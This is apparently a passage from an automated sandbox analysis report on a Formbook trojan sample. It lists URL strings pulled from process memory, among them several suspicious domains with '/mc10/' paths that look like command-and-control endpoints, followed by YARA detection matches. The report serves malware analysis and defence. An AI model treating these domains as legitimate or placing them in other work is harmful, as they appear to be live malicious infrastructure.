Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.bjcysadz.xyz
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.bjcysadz.xyz/mc10/
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.bjcysadz.xyz/mc10/www.zaki-argan.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.bjcysadz.xyzReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com/mc10/www.bjcysadz.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz/mc10/www.huttonsidel.online
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyzReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online/mc10/www.llngx.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.onlineReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/mc10/www.291van.fun
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com/mc10/www.ajansyapai.net
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com/mc10/www.at89v2.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com/mc10/www.fondsa.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703686104.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comne
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com/mc10/:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com/mc10/www.kurainu.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com/mc10/www.shophansler.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000004.00000000.1707756779.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000004.00000000.1701959899.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4142165391.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1702684644.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000003.3114554074.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000003.3114554074.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV

          E-Banking Fraud

          barindex
          Source: Yara match; File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
